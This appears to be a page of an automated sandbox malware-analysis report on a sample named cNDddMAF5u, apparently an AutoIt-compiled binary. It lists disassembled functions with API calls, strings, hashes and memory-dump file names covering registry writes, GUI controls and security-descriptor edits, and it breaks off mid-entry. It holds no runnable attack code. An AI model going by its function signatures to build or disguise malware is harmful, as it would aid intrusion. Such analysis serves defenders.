Opcode ID: cdaf07d7d2133eac99746c1d720d9e668e1b7087c8a7d52780a1c842e3d03f0b
Instruction ID: db5fe0ec62464260e6b64d7936c1892697c12666e8a794524e72ea6a28041721
Opcode Fuzzy Hash: cdaf07d7d2133eac99746c1d720d9e668e1b7087c8a7d52780a1c842e3d03f0b
Instruction Fuzzy Hash: 5CB17A71604341AFE704DF64C885B6ABBE5FF85350F40891CF999AB262C735E844CFA6

Function 00730241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007302E5
_wcslen.LIBCMT ref: 0073031F
_wcslen.LIBCMT ref: 00730389
_wcslen.LIBCMT ref: 007303F1
_wcslen.LIBCMT ref: 00730475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007304C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00730504

Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD

Part of subcall function 0070223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00702258
Part of subcall function 0070223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0070228A

Strings

SELECTINVERT, xrefs: 0073057E
GETSELECTED, xrefs: 007305E1
FINDITEM, xrefs: 00730627
SELECT, xrefs: 00730548
SELECTALL, xrefs: 00730515
ISSELECTED, xrefs: 007304DD
SELECTCLEAR, xrefs: 0073052D
VIEWCHANGE, xrefs: 00730675
DESELECT, xrefs: 0073059C
GETITEMCOUNT, xrefs: 00730316, 00730337
GETTEXT, xrefs: 007303EC, 00730407
GETSUBITEMCOUNT, xrefs: 00730384, 0073039F
GETSELECTEDCOUNT, xrefs: 00730470, 0073048B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: d6c5eeec2947e776baa6486275d4f09290e4cbc21dd0afb4fd8f69ed43c24065
Instruction ID: 65b978db7ae4529284bac04a981cc52ab33dd8fbb27af9b44e61dbb7d8a426fc
Opcode Fuzzy Hash: d6c5eeec2947e776baa6486275d4f09290e4cbc21dd0afb4fd8f69ed43c24065
Instruction Fuzzy Hash: 36E1CF31208201CFD754EF24C86192AB3E6BF89758F14496CF8969B3A7DB38ED45CB91

Function 006B8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006B8968
GetSystemMetrics.USER32(00000007), ref: 006B8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006B899B
GetSystemMetrics.USER32(00000008), ref: 006B89A3
GetSystemMetrics.USER32(00000004), ref: 006B89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006B89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006B89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006B8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006B8A3C
GetClientRect.USER32(00000000,000000FF), ref: 006B8A5A
GetStockObject.GDI32(00000011), ref: 006B8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 006B8A81

Part of subcall function 006B912D: GetCursorPos.USER32(?), ref: 006B9141
Part of subcall function 006B912D: ScreenToClient.USER32(00000000,?), ref: 006B915E
Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000001), ref: 006B9183
Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000002), ref: 006B919D

SetTimer.USER32(00000000,00000000,00000028,006B90FC), ref: 006B8AA8

Strings

AutoIt v3 GUI, xrefs: 006B8A20

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 14dc54f7cf47bfa177b229708c8a78a97ef4f65edcdd2d0aae94e32e928214f3
Instruction ID: 3bfc0631aef495041408a5687020f382822893cf2e167002b8ac7ff0155f728d
Opcode Fuzzy Hash: 14dc54f7cf47bfa177b229708c8a78a97ef4f65edcdd2d0aae94e32e928214f3
Instruction Fuzzy Hash: E6B15C75A00209EFDF14DF68CC45BEA3BB6FB48355F108129FA15AB290DB74A881CF55

Function 00700D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
Part of subcall function 007010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
Part of subcall function 007010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
Part of subcall function 007010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00700DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00700E29
GetLengthSid.ADVAPI32(?), ref: 00700E40
GetAce.ADVAPI32(?,00000000,?), ref: 00700E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00700E96
GetLengthSid.ADVAPI32(?), ref: 00700EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00700EB5
HeapAlloc.KERNEL32(00000000), ref: 00700EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00700EDD
CopySid.ADVAPI32(00000000), ref: 00700EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00700F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00700F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00700F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F6E
HeapFree.KERNEL32(00000000), ref: 00700F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F7E
HeapFree.KERNEL32(00000000), ref: 00700F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F8E
HeapFree.KERNEL32(00000000), ref: 00700F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00700FA1
HeapFree.KERNEL32(00000000), ref: 00700FA8

Part of subcall function 00701193: GetProcessHeap.KERNEL32(00000008,00700BB1,?,00000000,?,00700BB1,?), ref: 007011A1
Part of subcall function 00701193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00700BB1,?), ref: 007011A8
Part of subcall function 00701193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00700BB1,?), ref: 007011B7

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: d783a7eb0859b0ccc15d8e383a06002010885fafa1cbaf80fc8dd4b1cd74b495
Instruction ID: a22aa24014bdb48f1c1d8d43cb68c6a4d5f30185135c0d1f548a2bc39a9882bc
Opcode Fuzzy Hash: d783a7eb0859b0ccc15d8e383a06002010885fafa1cbaf80fc8dd4b1cd74b495
Instruction Fuzzy Hash: 3271617190020AEBDF119FA4DC45FAEBBB8BF05311F048215F959B6191D739AA05DBA0

Function 0072C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0073CC08,00000000,?,00000000,?,?), ref: 0072C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0072C5A4
_wcslen.LIBCMT ref: 0072C5F4
_wcslen.LIBCMT ref: 0072C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0072C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0072C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0072C84D
RegCloseKey.ADVAPI32(?), ref: 0072C881
RegCloseKey.ADVAPI32(00000000), ref: 0072C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0072C960

Strings

REG_QWORD, xrefs: 0072C8C3
REG_DWORD, xrefs: 0072C804
REG_SZ, xrefs: 0072C644
REG_BINARY, xrefs: 0072C913
REG_MULTI_SZ, xrefs: 0072C6F5
REG_EXPAND_SZ, xrefs: 0072C5CD

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: fce7b331fd93d93561243a8747dfb39f1a26fcc7356f76356e6580d20eb070d9
Instruction ID: 258f771ad8d706b2ce84f1b58b3c0fdf581cf18eca3a59df621730e3052cdf9b
Opcode Fuzzy Hash: fce7b331fd93d93561243a8747dfb39f1a26fcc7356f76356e6580d20eb070d9
Instruction Fuzzy Hash: DA1289356042109FDB15EF14D881A2AB7E6EF89314F14889CF88A9B3A2DB35FD41CF95

Function 0073091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007309C6
_wcslen.LIBCMT ref: 00730A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00730A54
_wcslen.LIBCMT ref: 00730A8A
_wcslen.LIBCMT ref: 00730B06
_wcslen.LIBCMT ref: 00730B81

Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD

Part of subcall function 00702BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00702BFA

Strings

COLLAPSE, xrefs: 00730B01, 00730B1C
GETSELECTED, xrefs: 00730C4E
GETTOTALCOUNT, xrefs: 007309F2, 00730A17
GETITEMCOUNT, xrefs: 00730C1E
EXPAND, xrefs: 00730BF8
GETTEXT, xrefs: 00730C97
UNCHECK, xrefs: 00730D3E
SELECT, xrefs: 00730D11
CHECK, xrefs: 00730A85, 00730AA0
ISCHECKED, xrefs: 00730CE1
EXISTS, xrefs: 00730B7C, 00730B97

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 5bd4b8e52e3998bbd730ca1d7fdeb0d768c9140e4a4ed11150700ad2592087b0
Instruction ID: d41dd7b2a39cf0568ccdcd69e31dfc2e2415bc1e9896c3fed3645afc0c522572
Opcode Fuzzy Hash: 5bd4b8e52e3998bbd730ca1d7fdeb0d768c9140e4a4ed11150700ad2592087b0
Instruction Fuzzy Hash: 45E1BD712083018FC754EF24C86092AB7E2BF98358F14895CF8969B3A2DB39ED45CB91

Function 0072C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
_wcslen.LIBCMT ref: 0072C9F1
_wcslen.LIBCMT ref: 0072CA68
_wcslen.LIBCMT ref: 0072CA9E
_wcslen.LIBCMT ref: 0072CAF9
_wcslen.LIBCMT ref: 0072CB2F
_wcslen.LIBCMT ref: 0072CB7F

Strings

HKCR, xrefs: 0072CB29, 0072CB2E
HKCC, xrefs: 0072CBAC
HKEY_LOCAL_MACHINE, xrefs: 0072CA62, 0072CA67
HKCU, xrefs: 0072CBCE
HKLM, xrefs: 0072CA98, 0072CA9D
HKEY_CLASSES_ROOT, xrefs: 0072CAF3, 0072CAF8
HKEY_USERS, xrefs: 0072CBDF
HKEY_CURRENT_USER, xrefs: 0072CBBD
HKEY_CURRENT_CONFIG, xrefs: 0072CB79, 0072CB7E
HKU, xrefs: 0072CBF0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: a64f5e8fbd502d2bbbbb9f82c42ffec90dc0242a630f34351583fe5328e43a9b
Instruction ID: 4d9bd2c757bedadbcdc4e9a1f3649ed3a55f0a7438e07a06221601d3035818a9
Opcode Fuzzy Hash: a64f5e8fbd502d2bbbbb9f82c42ffec90dc0242a630f34351583fe5328e43a9b
Instruction Fuzzy Hash: 0A71097260017A8BCB12DE7CED515BF33A19F71794B154528FC5697284E63DCD84C7A0

Function 0073833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0073835A
_wcslen.LIBCMT ref: 0073836E
_wcslen.LIBCMT ref: 00738391
_wcslen.LIBCMT ref: 007383B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007383F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00735BF2), ref: 0073844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00738487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007384CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00738501
FreeLibrary.KERNEL32(?), ref: 0073850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0073851D
DestroyIcon.USER32(?,?,?,?,?,00735BF2), ref: 0073852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00738549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00738555

Strings

.exe, xrefs: 00738388
.dll, xrefs: 007383AB
.icl, xrefs: 00738368

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: b82958c1f5fb7b3bb34641a6220f3a3bd56b2124129a169983337290c9ba94fc
Instruction ID: 93af6fac0452ac9947967806cafcbc584c1abe5db4f6517ccd04526f69b2f437
Opcode Fuzzy Hash: b82958c1f5fb7b3bb34641a6220f3a3bd56b2124129a169983337290c9ba94fc
Instruction Fuzzy Hash: D761D072500319BAFB55DF64CC45BBE77A8FB08721F108609F815E61D2DF78A990CBA0

Function 006A7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

Bad directive syntax error, xrefs: 006E519A
", xrefs: 006E5153
#pragma compile, xrefs: 006A77D3
#OnAutoItStartRegister, xrefs: 006A7817
#notrayicon, xrefs: 006A77E7
#include-once, xrefs: 006A782F
#ce, xrefs: 006A78ED
#comments-start, xrefs: 006A785F, 006A78B1
#requireadmin, xrefs: 006A77FF
#comments-end, xrefs: 006A78D9
', xrefs: 006E5169
Unterminated group of comments, xrefs: 006E528C
#cs, xrefs: 006A7873, 006A78C5
Cannot parse #include, xrefs: 006E5279
#include, xrefs: 006A7847

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: f9f13b4bd1aa0112f2f7c26bde49300c3a6af3452b4b4cfb7d7e47cabee85b60
Instruction ID: 87259439f749ad4c0a8581032308e032f561c606caaf20caaddf78310c2a2305
Opcode Fuzzy Hash: f9f13b4bd1aa0112f2f7c26bde49300c3a6af3452b4b4cfb7d7e47cabee85b60
Instruction Fuzzy Hash: 8E81D8B1604205BBDB60BF60DC42FEE776AAF16340F044028F9056B292EB74DE51DBA5

Function 00705A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00705A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00705A40
SetWindowTextW.USER32(?,?), ref: 00705A57
GetDlgItem.USER32(?,000003EA), ref: 00705A6C
SetWindowTextW.USER32(00000000,?), ref: 00705A72
GetDlgItem.USER32(?,000003E9), ref: 00705A82
SetWindowTextW.USER32(00000000,?), ref: 00705A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00705AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00705AC3
GetWindowRect.USER32(?,?), ref: 00705ACC
_wcslen.LIBCMT ref: 00705B33
SetWindowTextW.USER32(?,?), ref: 00705B6F
GetDesktopWindow.USER32 ref: 00705B75
GetWindowRect.USER32(00000000), ref: 00705B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00705BD3
GetClientRect.USER32(?,?), ref: 00705BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00705C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00705C2F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: df828fa8ca5c9b4e111704212d0a16451a8e7fc70675f2063b2a30fdb3801170
Instruction ID: a7f0ba0414fb6a3f4688a86c95b30b8bd3e4a9ad2168c8c53ef6906392fdf5c2
Opcode Fuzzy Hash: df828fa8ca5c9b4e111704212d0a16451a8e7fc70675f2063b2a30fdb3801170
Instruction Fuzzy Hash: 0A715B71A00B09EFDB21DFA8CE85AAFBBF5FB48705F104618E542A25A0D779B940CF54

Function 007030F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0070318D
_wcslen.LIBCMT ref: 007031F8

Strings

REGEXPCLASS, xrefs: 00703255, 00703266
NAME, xrefs: 00703335, 00703346
CLASSNN, xrefs: 007031F3, 00703204
INSTANCE, xrefs: 00703453
CLASS, xrefs: 00703188, 007031A5
[v, xrefs: 0070339A
TEXT, xrefs: 0070347C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[v
API String ID: 176396367-1498973047
Opcode ID: fb489e9b30dd849892a0c80b4373a2a85e11cc6008e24a4b33c8e2e44711596e
Instruction ID: e35c36b1c591e27cd6ea6f392cc483afc7db6fff1509190a343fc575a3dd775c
Opcode Fuzzy Hash: fb489e9b30dd849892a0c80b4373a2a85e11cc6008e24a4b33c8e2e44711596e
Instruction Fuzzy Hash: 9EE1D431A00516DACB149F74C851AFDFBF9BF44710F54832AE456A7290DB38AE859B90

Function 006C00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 006C00C6

Part of subcall function 006C00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0077070C,00000FA0,11DDEE30,?,?,?,?,006E23B3,000000FF), ref: 006C011C
Part of subcall function 006C00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006E23B3,000000FF), ref: 006C0127
Part of subcall function 006C00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006E23B3,000000FF), ref: 006C0138
Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006C014E
Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006C015C
Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006C016A
Part of subcall function 006C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006C0195
Part of subcall function 006C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006C01A0

___scrt_fastfail.LIBCMT ref: 006C00E7

Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9

Strings

SleepConditionVariableCS, xrefs: 006C0154
InitializeConditionVariable, xrefs: 006C0148
WakeAllConditionVariable, xrefs: 006C0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 006C0122
kernel32.dll, xrefs: 006C0133

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: de8e0d18c4adf8cbd96e308e1dc757f7fc8c2869b34189eb5ea3da1bce9af615
Instruction ID: a5888ccc8a98820219cced45beddc8f1cd22cae52f6d8abac09b494e955979fb
Opcode Fuzzy Hash: de8e0d18c4adf8cbd96e308e1dc757f7fc8c2869b34189eb5ea3da1bce9af615
Instruction Fuzzy Hash: DB21DAB2B44710EBFB115BB4AC09F797395DB04B91F15412DF805A2691DB789C008BD8

Function 007144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0073CC08), ref: 00714527
_wcslen.LIBCMT ref: 0071453B
_wcslen.LIBCMT ref: 00714599
_wcslen.LIBCMT ref: 007145F4
